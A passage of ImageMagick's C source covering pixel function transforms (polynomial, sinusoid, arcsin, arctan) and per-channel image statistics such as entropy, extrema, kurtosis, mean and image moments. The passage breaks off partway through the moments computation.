% const MagickFunction function,const ssize_t number_parameters,
% const double *parameters,ExceptionInfo *exception)
% MagickBooleanType FunctionImageChannel(Image *image,
% const ChannelType channel,const MagickFunction function,
% const ssize_t number_parameters,const double *argument,
% ExceptionInfo *exception)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o channel: the channel.
%
% o function: A channel function.
%
% o parameters: one or more parameters.
%
% o exception: return any errors or warnings in this structure.
%
*/
static Quantum ApplyFunction(Quantum pixel,const MagickFunction function,
const size_t number_parameters,const double *parameters,
ExceptionInfo *exception)
{
MagickRealType
result;
register ssize_t
i;
(void) exception;
result=0.0;
switch (function)
{
case PolynomialFunction:
{
/*
* Polynomial
* Parameters: polynomial constants, highest to lowest order
* For example: c0*x^3 + c1*x^2 + c2*x + c3
*/
result=0.0;
for (i=0; i < (ssize_t) number_parameters; i++)
result=result*QuantumScale*pixel + parameters[i];
result*=QuantumRange;
break;
}
case SinusoidFunction:
{
/* Sinusoid Function
* Parameters: Freq, Phase, Ampl, bias
*/
double freq,phase,ampl,bias;
freq = ( number_parameters >= 1 ) ? parameters[0] : 1.0;
phase = ( number_parameters >= 2 ) ? parameters[1] : 0.0;
ampl = ( number_parameters >= 3 ) ? parameters[2] : 0.5;
bias = ( number_parameters >= 4 ) ? parameters[3] : 0.5;
result=(MagickRealType) (QuantumRange*(ampl*sin((double) (2.0*MagickPI*
(freq*QuantumScale*pixel + phase/360.0) )) + bias ) );
break;
}
case ArcsinFunction:
{
/* Arcsin Function (peged at range limits for invalid results)
* Parameters: Width, Center, Range, Bias
*/
double width,range,center,bias;
width = ( number_parameters >= 1 ) ? parameters[0] : 1.0;
center = ( number_parameters >= 2 ) ? parameters[1] : 0.5;
range = ( number_parameters >= 3 ) ? parameters[2] : 1.0;
bias = ( number_parameters >= 4 ) ? parameters[3] : 0.5;
result = 2.0/width*(QuantumScale*pixel - center);
if ( result <= -1.0 )
result = bias - range/2.0;
else if ( result >= 1.0 )
result = bias + range/2.0;
else
result=(MagickRealType) (range/MagickPI*asin((double) result)+bias);
result *= QuantumRange;
break;
}
case ArctanFunction:
{
/* Arctan Function
* Parameters: Slope, Center, Range, Bias
*/
double slope,range,center,bias;
slope = ( number_parameters >= 1 ) ? parameters[0] : 1.0;
center = ( number_parameters >= 2 ) ? parameters[1] : 0.5;
range = ( number_parameters >= 3 ) ? parameters[2] : 1.0;
bias = ( number_parameters >= 4 ) ? parameters[3] : 0.5;
result=(MagickRealType) (MagickPI*slope*(QuantumScale*pixel-center));
result=(MagickRealType) (QuantumRange*(range/MagickPI*atan((double)
result) + bias ) );
break;
}
case UndefinedFunction:
break;
}
return(ClampToQuantum(result));
}
MagickExport MagickBooleanType FunctionImage(Image *image,
const MagickFunction function,const size_t number_parameters,
const double *parameters,ExceptionInfo *exception)
{
MagickBooleanType
status;
status=FunctionImageChannel(image,CompositeChannels,function,
number_parameters,parameters,exception);
return(status);
}
MagickExport MagickBooleanType FunctionImageChannel(Image *image,
const ChannelType channel,const MagickFunction function,
const size_t number_parameters,const double *parameters,
ExceptionInfo *exception)
{
#define FunctionImageTag "Function/Image "
CacheView
*image_view;
MagickBooleanType
status;
MagickOffsetType
progress;
ssize_t
y;
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
assert(exception != (ExceptionInfo *) NULL);
assert(exception->signature == MagickCoreSignature);
if (SetImageStorageClass(image,DirectClass) == MagickFalse)
{
InheritException(exception,&image->exception);
return(MagickFalse);
}
#if defined(MAGICKCORE_OPENCL_SUPPORT)
status=AccelerateFunctionImage(image,channel,function,number_parameters,
parameters,exception);
if (status != MagickFalse)
return(status);
#endif
status=MagickTrue;
progress=0;
image_view=AcquireAuthenticCacheView(image,exception);
#if defined(MAGICKCORE_OPENMP_SUPPORT)
#pragma omp parallel for schedule(static) shared(progress,status) \
magick_number_threads(image,image,image->rows,1)
#endif
for (y=0; y < (ssize_t) image->rows; y++)
{
register IndexPacket
*magick_restrict indexes;
register ssize_t
x;
register PixelPacket
*magick_restrict q;
if (status == MagickFalse)
continue;
q=GetCacheViewAuthenticPixels(image_view,0,y,image->columns,1,exception);
if (q == (PixelPacket *) NULL)
{
status=MagickFalse;
continue;
}
indexes=GetCacheViewAuthenticIndexQueue(image_view);
for (x=0; x < (ssize_t) image->columns; x++)
{
if ((channel & RedChannel) != 0)
SetPixelRed(q,ApplyFunction(GetPixelRed(q),function,
number_parameters,parameters,exception));
if ((channel & GreenChannel) != 0)
SetPixelGreen(q,ApplyFunction(GetPixelGreen(q),function,
number_parameters,parameters,exception));
if ((channel & BlueChannel) != 0)
SetPixelBlue(q,ApplyFunction(GetPixelBlue(q),function,
number_parameters,parameters,exception));
if ((channel & OpacityChannel) != 0)
{
if (image->matte == MagickFalse)
SetPixelOpacity(q,ApplyFunction(GetPixelOpacity(q),function,
number_parameters,parameters,exception));
else
SetPixelAlpha(q,ApplyFunction((Quantum) GetPixelAlpha(q),function,
number_parameters,parameters,exception));
}
if (((channel & IndexChannel) != 0) && (indexes != (IndexPacket *) NULL))
SetPixelIndex(indexes+x,ApplyFunction(GetPixelIndex(indexes+x),function,
number_parameters,parameters,exception));
q++;
}
if (SyncCacheViewAuthenticPixels(image_view,exception) == MagickFalse)
status=MagickFalse;
if (image->progress_monitor != (MagickProgressMonitor) NULL)
{
MagickBooleanType
proceed;
proceed=SetImageProgress(image,FunctionImageTag,progress++,image->rows);
if (proceed == MagickFalse)
status=MagickFalse;
}
}
image_view=DestroyCacheView(image_view);
return(status);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% G e t I m a g e C h a n n e l E n t r o p y %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% GetImageChannelEntropy() returns the entropy of one or more image channels.
%
% The format of the GetImageChannelEntropy method is:
%
% MagickBooleanType GetImageChannelEntropy(const Image *image,
% const ChannelType channel,double *entropy,ExceptionInfo *exception)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o channel: the channel.
%
% o entropy: the average entropy of the selected channels.
%
% o exception: return any errors or warnings in this structure.
%
*/
MagickExport MagickBooleanType GetImageEntropy(const Image *image,
double *entropy,ExceptionInfo *exception)
{
MagickBooleanType
status;
status=GetImageChannelEntropy(image,CompositeChannels,entropy,exception);
return(status);
}
MagickExport MagickBooleanType GetImageChannelEntropy(const Image *image,
const ChannelType channel,double *entropy,ExceptionInfo *exception)
{
ChannelStatistics
*channel_statistics;
size_t
channels;
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
channel_statistics=GetImageChannelStatistics(image,exception);
if (channel_statistics == (ChannelStatistics *) NULL)
return(MagickFalse);
channels=0;
channel_statistics[CompositeChannels].entropy=0.0;
if ((channel & RedChannel) != 0)
{
channel_statistics[CompositeChannels].entropy+=
channel_statistics[RedChannel].entropy;
channels++;
}
if ((channel & GreenChannel) != 0)
{
channel_statistics[CompositeChannels].entropy+=
channel_statistics[GreenChannel].entropy;
channels++;
}
if ((channel & BlueChannel) != 0)
{
channel_statistics[CompositeChannels].entropy+=
channel_statistics[BlueChannel].entropy;
channels++;
}
if (((channel & OpacityChannel) != 0) && (image->matte != MagickFalse))
{
channel_statistics[CompositeChannels].entropy+=
channel_statistics[OpacityChannel].entropy;
channels++;
}
if (((channel & IndexChannel) != 0) &&
(image->colorspace == CMYKColorspace))
{
channel_statistics[CompositeChannels].entropy+=
channel_statistics[BlackChannel].entropy;
channels++;
}
channel_statistics[CompositeChannels].entropy/=channels;
*entropy=channel_statistics[CompositeChannels].entropy;
channel_statistics=(ChannelStatistics *) RelinquishMagickMemory(
channel_statistics);
return(MagickTrue);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
+ G e t I m a g e C h a n n e l E x t r e m a %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% GetImageChannelExtrema() returns the extrema of one or more image channels.
%
% The format of the GetImageChannelExtrema method is:
%
% MagickBooleanType GetImageChannelExtrema(const Image *image,
% const ChannelType channel,size_t *minima,size_t *maxima,
% ExceptionInfo *exception)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o channel: the channel.
%
% o minima: the minimum value in the channel.
%
% o maxima: the maximum value in the channel.
%
% o exception: return any errors or warnings in this structure.
%
*/
MagickExport MagickBooleanType GetImageExtrema(const Image *image,
size_t *minima,size_t *maxima,ExceptionInfo *exception)
{
MagickBooleanType
status;
status=GetImageChannelExtrema(image,CompositeChannels,minima,maxima,
exception);
return(status);
}
MagickExport MagickBooleanType GetImageChannelExtrema(const Image *image,
const ChannelType channel,size_t *minima,size_t *maxima,
ExceptionInfo *exception)
{
double
max,
min;
MagickBooleanType
status;
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
status=GetImageChannelRange(image,channel,&min,&max,exception);
*minima=(size_t) ceil(min-0.5);
*maxima=(size_t) floor(max+0.5);
return(status);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% G e t I m a g e C h a n n e l K u r t o s i s %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% GetImageChannelKurtosis() returns the kurtosis and skewness of one or more
% image channels.
%
% The format of the GetImageChannelKurtosis method is:
%
% MagickBooleanType GetImageChannelKurtosis(const Image *image,
% const ChannelType channel,double *kurtosis,double *skewness,
% ExceptionInfo *exception)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o channel: the channel.
%
% o kurtosis: the kurtosis of the channel.
%
% o skewness: the skewness of the channel.
%
% o exception: return any errors or warnings in this structure.
%
*/
MagickExport MagickBooleanType GetImageKurtosis(const Image *image,
double *kurtosis,double *skewness,ExceptionInfo *exception)
{
MagickBooleanType
status;
status=GetImageChannelKurtosis(image,CompositeChannels,kurtosis,skewness,
exception);
return(status);
}
MagickExport MagickBooleanType GetImageChannelKurtosis(const Image *image,
const ChannelType channel,double *kurtosis,double *skewness,
ExceptionInfo *exception)
{
double
area,
mean,
standard_deviation,
sum_squares,
sum_cubes,
sum_fourth_power;
ssize_t
y;
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
*kurtosis=0.0;
*skewness=0.0;
area=0.0;
mean=0.0;
standard_deviation=0.0;
sum_squares=0.0;
sum_cubes=0.0;
sum_fourth_power=0.0;
for (y=0; y < (ssize_t) image->rows; y++)
{
register const IndexPacket
*magick_restrict indexes;
register const PixelPacket
*magick_restrict p;
register ssize_t
x;
p=GetVirtualPixels(image,0,y,image->columns,1,exception);
if (p == (const PixelPacket *) NULL)
break;
indexes=GetVirtualIndexQueue(image);
for (x=0; x < (ssize_t) image->columns; x++)
{
if ((channel & RedChannel) != 0)
{
mean+=GetPixelRed(p);
sum_squares+=(double) GetPixelRed(p)*GetPixelRed(p);
sum_cubes+=(double) GetPixelRed(p)*GetPixelRed(p)*GetPixelRed(p);
sum_fourth_power+=(double) GetPixelRed(p)*GetPixelRed(p)*
GetPixelRed(p)*GetPixelRed(p);
area++;
}
if ((channel & GreenChannel) != 0)
{
mean+=GetPixelGreen(p);
sum_squares+=(double) GetPixelGreen(p)*GetPixelGreen(p);
sum_cubes+=(double) GetPixelGreen(p)*GetPixelGreen(p)*
GetPixelGreen(p);
sum_fourth_power+=(double) GetPixelGreen(p)*GetPixelGreen(p)*
GetPixelGreen(p)*GetPixelGreen(p);
area++;
}
if ((channel & BlueChannel) != 0)
{
mean+=GetPixelBlue(p);
sum_squares+=(double) GetPixelBlue(p)*GetPixelBlue(p);
sum_cubes+=(double) GetPixelBlue(p)*GetPixelBlue(p)*GetPixelBlue(p);
sum_fourth_power+=(double) GetPixelBlue(p)*GetPixelBlue(p)*
GetPixelBlue(p)*GetPixelBlue(p);
area++;
}
if ((channel & OpacityChannel) != 0)
{
mean+=GetPixelAlpha(p);
sum_squares+=(double) GetPixelOpacity(p)*GetPixelAlpha(p);
sum_cubes+=(double) GetPixelOpacity(p)*GetPixelAlpha(p)*
GetPixelAlpha(p);
sum_fourth_power+=(double) GetPixelAlpha(p)*GetPixelAlpha(p)*
GetPixelAlpha(p)*GetPixelAlpha(p);
area++;
}
if (((channel & IndexChannel) != 0) &&
(image->colorspace == CMYKColorspace))
{
double
index;
index=(double) GetPixelIndex(indexes+x);
mean+=index;
sum_squares+=index*index;
sum_cubes+=index*index*index;
sum_fourth_power+=index*index*index*index;
area++;
}
p++;
}
}
if (y < (ssize_t) image->rows)
return(MagickFalse);
if (area != 0.0)
{
mean/=area;
sum_squares/=area;
sum_cubes/=area;
sum_fourth_power/=area;
}
standard_deviation=sqrt(sum_squares-(mean*mean));
if (standard_deviation != 0.0)
{
*kurtosis=sum_fourth_power-4.0*mean*sum_cubes+6.0*mean*mean*sum_squares-
3.0*mean*mean*mean*mean;
*kurtosis/=standard_deviation*standard_deviation*standard_deviation*
standard_deviation;
*kurtosis-=3.0;
*skewness=sum_cubes-3.0*mean*sum_squares+2.0*mean*mean*mean;
*skewness/=standard_deviation*standard_deviation*standard_deviation;
}
return(y == (ssize_t) image->rows ? MagickTrue : MagickFalse);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% G e t I m a g e C h a n n e l M e a n %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% GetImageChannelMean() returns the mean and standard deviation of one or more
% image channels.
%
% The format of the GetImageChannelMean method is:
%
% MagickBooleanType GetImageChannelMean(const Image *image,
% const ChannelType channel,double *mean,double *standard_deviation,
% ExceptionInfo *exception)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o channel: the channel.
%
% o mean: the average value in the channel.
%
% o standard_deviation: the standard deviation of the channel.
%
% o exception: return any errors or warnings in this structure.
%
*/
MagickExport MagickBooleanType GetImageMean(const Image *image,double *mean,
double *standard_deviation,ExceptionInfo *exception)
{
MagickBooleanType
status;
status=GetImageChannelMean(image,CompositeChannels,mean,standard_deviation,
exception);
return(status);
}
MagickExport MagickBooleanType GetImageChannelMean(const Image *image,
const ChannelType channel,double *mean,double *standard_deviation,
ExceptionInfo *exception)
{
ChannelStatistics
*channel_statistics;
size_t
channels;
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
channel_statistics=GetImageChannelStatistics(image,exception);
if (channel_statistics == (ChannelStatistics *) NULL)
return(MagickFalse);
channels=0;
channel_statistics[CompositeChannels].mean=0.0;
channel_statistics[CompositeChannels].standard_deviation=0.0;
if ((channel & RedChannel) != 0)
{
channel_statistics[CompositeChannels].mean+=
channel_statistics[RedChannel].mean;
channel_statistics[CompositeChannels].standard_deviation+=
channel_statistics[RedChannel].standard_deviation;
channels++;
}
if ((channel & GreenChannel) != 0)
{
channel_statistics[CompositeChannels].mean+=
channel_statistics[GreenChannel].mean;
channel_statistics[CompositeChannels].standard_deviation+=
channel_statistics[GreenChannel].standard_deviation;
channels++;
}
if ((channel & BlueChannel) != 0)
{
channel_statistics[CompositeChannels].mean+=
channel_statistics[BlueChannel].mean;
channel_statistics[CompositeChannels].standard_deviation+=
channel_statistics[BlueChannel].standard_deviation;
channels++;
}
if (((channel & OpacityChannel) != 0) && (image->matte != MagickFalse))
{
channel_statistics[CompositeChannels].mean+=
(QuantumRange-channel_statistics[OpacityChannel].mean);
channel_statistics[CompositeChannels].standard_deviation+=
channel_statistics[OpacityChannel].standard_deviation;
channels++;
}
if (((channel & IndexChannel) != 0) && (image->colorspace == CMYKColorspace))
{
channel_statistics[CompositeChannels].mean+=
channel_statistics[BlackChannel].mean;
channel_statistics[CompositeChannels].standard_deviation+=
channel_statistics[CompositeChannels].standard_deviation;
channels++;
}
channel_statistics[CompositeChannels].mean/=channels;
channel_statistics[CompositeChannels].standard_deviation/=channels;
*mean=channel_statistics[CompositeChannels].mean;
*standard_deviation=channel_statistics[CompositeChannels].standard_deviation;
channel_statistics=(ChannelStatistics *) RelinquishMagickMemory(
channel_statistics);
return(MagickTrue);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% G e t I m a g e C h a n n e l M o m e n t s %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% GetImageChannelMoments() returns the normalized moments of one or more image
% channels.
%
% The format of the GetImageChannelMoments method is:
%
% ChannelMoments *GetImageChannelMoments(const Image *image,
% ExceptionInfo *exception)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o exception: return any errors or warnings in this structure.
%
*/
MagickExport ChannelMoments *GetImageChannelMoments(const Image *image,
ExceptionInfo *exception)
{
#define MaxNumberImageMoments 8
ChannelMoments
*channel_moments;
double
M00[CompositeChannels+1],
M01[CompositeChannels+1],
M02[CompositeChannels+1],
M03[CompositeChannels+1],
M10[CompositeChannels+1],
M11[CompositeChannels+1],
M12[CompositeChannels+1],
M20[CompositeChannels+1],
M21[CompositeChannels+1],
M22[CompositeChannels+1],
M30[CompositeChannels+1];
MagickPixelPacket
pixel;
PointInfo
centroid[CompositeChannels+1];
ssize_t
channel,
channels,
y;
size_t
length;
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
length=CompositeChannels+1UL;
channel_moments=(ChannelMoments *) AcquireQuantumMemory(length,
sizeof(*channel_moments));
if (channel_moments == (ChannelMoments *) NULL)
return(channel_moments);
(void) memset(channel_moments,0,length*sizeof(*channel_moments));
(void) memset(centroid,0,sizeof(centroid));
(void) memset(M00,0,sizeof(M00));
(void) memset(M01,0,sizeof(M01));
(void) memset(M02,0,sizeof(M02));
(void) memset(M03,0,sizeof(M03));
(void) memset(M10,0,sizeof(M10));
(void) memset(M11,0,sizeof(M11));
(void) memset(M12,0,sizeof(M12));
(void) memset(M20,0,sizeof(M20));
(void) memset(M21,0,sizeof(M21));
(void) memset(M22,0,sizeof(M22));
(void) memset(M30,0,sizeof(M30));
GetMagickPixelPacket(image,&pixel);
for (y=0; y < (ssize_t) image->rows; y++)
{
register const IndexPacket
*magick_restrict indexes;
register const PixelPacket
*magick_restrict p;
register ssize_t
x;
/*
Compute center of mass (centroid).
*/
p=GetVirtualPixels(image,0,y,image->columns,1,exception);
if (p == (const PixelPacket *) NULL)
break;
indexes=GetVirtualIndexQueue(image);
for (x=0; x < (ssize_t) image->columns; x++)
{
SetMagickPixelPacket(image,p,indexes+x,&pixel);
M00[RedChannel]+=QuantumScale*pixel.red;
M10[RedChannel]+=x*QuantumScale*pixel.red;
M01[RedChannel]+=y*QuantumScale*pixel.red;
M00[GreenChannel]+=QuantumScale*pixel.green;
M10[GreenChannel]+=x*QuantumScale*pixel.green;
M01[GreenChannel]+=y*QuantumScale*pixel.green;
M00[BlueChannel]+=QuantumScale*pixel.blue;
M10[BlueChannel]+=x*QuantumScale*pixel.blue;
M01[BlueChannel]+=y*QuantumScale*pixel.blue;
if (image->matte != MagickFalse)
{
M00[OpacityChannel]+=QuantumScale*pixel.opacity;
M10[OpacityChannel]+=x*QuantumScale*pixel.opacity;
M01[OpacityChannel]+=y*QuantumScale*pixel.opacity;
}
if (image->colorspace == CMYKColorspace)
{
M00[IndexChannel]+=QuantumScale*pixel.index;
M10[IndexChannel]+=x*QuantumScale*pixel.index;
M01[IndexChannel]+=y*QuantumScale*pixel.index;
}
p++;
}
}
for (channel=0; channel <= CompositeChannels; channel++)
{
/*
Compute center of mass (centroid).
*/
if (M00[channel] < MagickEpsilon)
{
M00[channel]+=MagickEpsilon;
centroid[channel].x=(double) image->columns/2.0;
centroid[channel].y=(double) image->rows/2.0;
continue;
}
M00[channel]+=MagickEpsilon;
centroid[channel].x=M10[channel]/M00[channel];
centroid[channel].y=M01[channel]/M00[channel];
}
for (y=0; y < (ssize_t) image->rows; y++)
{
register const IndexPacket
*magick_restrict indexes;
register const PixelPacket
*magick_restrict p;
register ssize_t
x;
/*
Compute the image moments.
*/
p=GetVirtualPixels(image,0,y,image->columns,1,exception);
if (p == (const PixelPacket *) NULL)
break;
indexes=GetVirtualIndexQueue(image);
for (x=0; x < (ssize_t) image->columns; x++)
{
SetMagickPixelPacket(image,p,indexes+x,&pixel);
M11[RedChannel]+=(x-centroid[RedChannel].x)*(y-
centroid[RedChannel].y)*QuantumScale*pixel.red;
M20[RedChannel]+=(x-centroid[RedChannel].x)*(x-
centroid[RedChannel].x)*QuantumScale*pixel.red;
M02[RedChannel]+=(y-centroid[RedChannel].y)*(y-
centroid[RedChannel].y)*QuantumScale*pixel.red;
M21[RedChannel]+=(x-centroid[RedChannel].x)*(x-
centroid[RedChannel].x)*(y-centroid[RedChannel].y)*QuantumScale*
pixel.red;
M12[RedChannel]+=(x-centroid[RedChannel].x)*(y-
centroid[RedChannel].y)*(y-centroid[RedChannel].y)*QuantumScale*
pixel.red;
M22[RedChannel]+=(x-centroid[RedChannel].x)*(x-
centroid[RedChannel].x)*(y-centroid[RedChannel].y)*(y-
centroid[RedChannel].y)*QuantumScale*pixel.red;
M30[RedChannel]+=(x-centroid[RedChannel].x)*(x-
centroid[RedChannel].x)*(x-centroid[RedChannel].x)*QuantumScale*
pixel.red;
M03[RedChannel]+=(y-centroid[RedChannel].y)*(y-
centroid[RedChannel].y)*(y-centroid[RedChannel].y)*QuantumScale*
pixel.red;
M11[GreenChannel]+=(x-centroid[GreenChannel].x)*(y-
centroid[GreenChannel].y)*QuantumScale*pixel.green;
M20[GreenChannel]+=(x-centroid[GreenChannel].x)*(x-
centroid[GreenChannel].x)*QuantumScale*pixel.green;
M02[GreenChannel]+=(y-centroid[GreenChannel].y)*(y-
centroid[GreenChannel].y)*QuantumScale*pixel.green;
M21[GreenChannel]+=(x-centroid[GreenChannel].x)*(x-
centroid[GreenChannel].x)*(y-centroid[GreenChannel].y)*QuantumScale*
pixel.green;
M12[GreenChannel]+=(x-centroid[GreenChannel].x)*(y-
centroid[GreenChannel].y)*(y-centroid[GreenChannel].y)*QuantumScale*
pixel.green;
M22[GreenChannel]+=(x-centroid[GreenChannel].x)*(x-
centroid[GreenChannel].x)*(y-centroid[GreenChannel].y)*(y-
centroid[GreenChannel].y)*QuantumScale*pixel.green;
M30[GreenChannel]+=(x-centroid[GreenChannel].x)*(x-
centroid[GreenChannel].x)*(x-centroid[GreenChannel].x)*QuantumScale*
pixel.green;
M03[GreenChannel]+=(y-centroid[GreenChannel].y)*(y-
centroid[GreenChannel].y)*(y-centroid[GreenChannel].y)*QuantumScale*
pixel.green;
M11[BlueChannel]+=(x-centroid[BlueChannel].x)*(y-
centroid[BlueChannel].y)*QuantumScale*pixel.blue;
M20[BlueChannel]+=(x-centroid[BlueChannel].x)*(x-
centroid[BlueChannel].x)*QuantumScale*pixel.blue;
M02[BlueChannel]+=(y-centroid[BlueChannel].y)*(y-
centroid[BlueChannel].y)*QuantumScale*pixel.blue;
M21[BlueChannel]+=(x-centroid[BlueChannel].x)*(x-
centroid[BlueChannel].x)*(y-centroid[BlueChannel].y)*QuantumScale*
pixel.blue;
M12[BlueChannel]+=(x-centroid[BlueChannel].x)*(y-
centroid[BlueChannel].y)*(y-centroid[BlueChannel].y)*QuantumScale*
pixel.blue;
M22[BlueChannel]+=(x-centroid[BlueChannel].x)*(x-
centroid[BlueChannel].x)*(y-centroid[BlueChannel].y)*(y-
centroid[BlueChannel].y)*QuantumScale*pixel.blue;
M30[BlueChannel]+=(x-centroid[BlueChannel].x)*(x-
centroid[BlueChannel].x)*(x-centroid[BlueChannel].x)*QuantumScale*
pixel.blue;
M03[BlueChannel]+=(y-centroid[BlueChannel].y)*(y-
centroid[BlueChannel].y)*(y-centroid[BlueChannel].y)*QuantumScale*
pixel.blue;
if (image->matte != MagickFalse)
{
M11[OpacityChannel]+=(x-centroid[OpacityChannel].x)*(y-
centroid[OpacityChannel].y)*QuantumScale*pixel.opacity;
M20[OpacityChannel]+=(x-centroid[OpacityChannel].x)*(x-
centroid[OpacityChannel].x)*QuantumScale*pixel.opacity;
M02[OpacityChannel]+=(y-centroid[OpacityChannel].y)*(y-
centroid[OpacityChannel].y)*QuantumScale*pixel.opacity;
M21[OpacityChannel]+=(x-centroid[OpacityChannel].x)*(x-
centroid[OpacityChannel].x)*(y-centroid[OpacityChannel].y)*
QuantumScale*pixel.opacity;
M12[OpacityChannel]+=(x-centroid[OpacityChannel].x)*(y-
centroid[OpacityChannel].y)*(y-centroid[OpacityChannel].y)*
QuantumScale*pixel.opacity;
M22[OpacityChannel]+=(x-centroid[OpacityChannel].x)*(x-
centroid[OpacityChannel].x)*(y-centroid[OpacityChannel].y)*(y-
centroid[OpacityChannel].y)*QuantumScale*pixel.opacity;
M30[OpacityChannel]+=(x-centroid[OpacityChannel].x)*(x-
centroid[OpacityChannel].x)*(x-centroid[OpacityChannel].x)*
QuantumScale*pixel.opacity;
M03[OpacityChannel]+=(y-centroid[OpacityChannel].y)*(y-
centroid[OpacityChannel].y)*(y-centroid[OpacityChannel].y)*
QuantumScale*pixel.opacity;
}
if (image->colorspace == CMYKColorspace)
{
M11[IndexChannel]+=(x-centroid[IndexChannel].x)*(y-
centroid[IndexChannel].y)*QuantumScale*pixel.index;
M20[IndexChannel]+=(x-centroid[IndexChannel].x)*(x-
centroid[IndexChannel].x)*QuantumScale*pixel.index;
M02[IndexChannel]+=(y-centroid[IndexChannel].y)*(y-
centroid[IndexChannel].y)*QuantumScale*pixel.index;
M21[IndexChannel]+=(x-centroid[IndexChannel].x)*(x-
centroid[IndexChannel].x)*(y-centroid[IndexChannel].y)*
QuantumScale*pixel.index;
M12[IndexChannel]+=(x-centroid[IndexChannel].x)*(y-
centroid[IndexChannel].y)*(y-centroid[IndexChannel].y)*
QuantumScale*pixel.index;
M22[IndexChannel]+=(x-centroid[IndexChannel].x)*(x-
centroid[IndexChannel].x)*(y-centroid[IndexChannel].y)*(y-
centroid[IndexChannel].y)*QuantumScale*pixel.index;
M30[IndexChannel]+=(x-centroid[IndexChannel].x)*(x-
centroid[IndexChannel].x)*(x-centroid[IndexChannel].x)*
QuantumScale*pixel.index;
M03[IndexChannel]+=(y-centroid[IndexChannel].y)*(y-
centroid[IndexChannel].y)*(y-centroid[IndexChannel].y)*
QuantumScale*pixel.index;
}
p++;
}
}
channels=3;
M00[CompositeChannels]+=(M00[RedChannel]+M00[GreenChannel]+M00[BlueChannel]);
M01[CompositeChannels]+=(M01[RedChannel]+M01[GreenChannel]+M01[BlueChannel]);
M02[CompositeChannels]+=(M02[RedChannel]+M02[GreenChannel]+M02[BlueChannel]);
M03[CompositeChannels]+=(M03[RedChannel]+M03[GreenChannel]+M03[BlueChannel]);
M10[CompositeChannels]+=(M10[RedChannel]+M10[GreenChannel]+M10[BlueChannel]);
M11[CompositeChannels]+=(M11[RedChannel]+M11[GreenChannel]+M11[BlueChannel]);
M12[CompositeChannels]+=(M12[RedChannel]+M12[GreenChannel]+M12[BlueChannel]);
M20[CompositeChannels]+=(M20[RedChannel]+M20[GreenChannel]+M20[BlueChannel]);
M21[CompositeChannels]+=(M21[RedChannel]+M21[GreenChannel]+M21[BlueChannel]);
M22[CompositeChannels]+=(M22[RedChannel]+M22[GreenChannel]+M22[BlueChannel]);
M30[CompositeChannels]+=(M30[RedChannel]+M30[GreenChannel]+M30[BlueChannel]);
if (image->matte != MagickFalse)
{
channels+=1;
M00[CompositeChannels]+=M00[OpacityChannel];
M01[CompositeChannels]+=M01[OpacityChannel];
M02[CompositeChannels]+=M02[OpacityChannel];
M03[CompositeChannels]+=M03[OpacityChannel];
M10[CompositeChannels]+=M10[OpacityChannel];
M11[CompositeChannels]+=M11[OpacityChannel];
M12[CompositeChannels]+=M12[OpacityChannel];
M20[CompositeChannels]+=M20[OpacityChannel];
M21[CompositeChannels]+=M21[OpacityChannel];
M22[CompositeChannels]+=M22[OpacityChannel];
M30[CompositeChannels]+=M30[OpacityChannel];
}
if (image->colorspace == CMYKColorspace)
{
channels+=1;
M00[CompositeChannels]+=M00[IndexChannel];
M01[CompositeChannels]+=M01[IndexChannel];
M02[CompositeChannels]+=M02[IndexChannel];
M03[CompositeChannels]+=M03[IndexChannel];
M10[CompositeChannels]+=M10[IndexChannel];
M11[CompositeChannels]+=M11[IndexChannel];
M12[CompositeChannels]+=M12[IndexChannel];
